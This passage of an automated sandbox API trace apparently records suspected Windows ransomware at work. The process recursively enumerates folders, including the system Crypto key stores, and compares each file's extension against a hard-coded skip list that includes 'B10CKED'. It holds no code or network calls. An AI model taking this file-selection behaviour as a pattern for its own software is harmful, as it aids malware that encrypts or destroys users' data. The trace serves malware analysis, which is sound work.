FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 1 [0107.921] FindNextFileW (in: hFindFile=0x1c8028, lpFindFileData=0x12e644 | out: lpFindFileData=0x12e644) returned 0 [0107.921] FindClose (in: hFindFile=0x1c8028 | out: hFindFile=0x1c8028) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0107.922] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0107.922] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0107.922] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0107.923] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.923] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.923] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.923] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.923] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.923] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.961] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.961] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.961] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.961] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.961] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0107.962] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.962] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0107.962] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0107.962] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0107.963] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0107.963] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0107.963] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0 [0108.038] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0108.038] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0108.038] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0108.103] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.103] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.103] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.103] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.180] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.180] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.181] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="XML", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="XML", cchCount2=3) returned 2 [0108.182] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.182] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="PNG", cchCount2=3) returned 3 [0108.183] 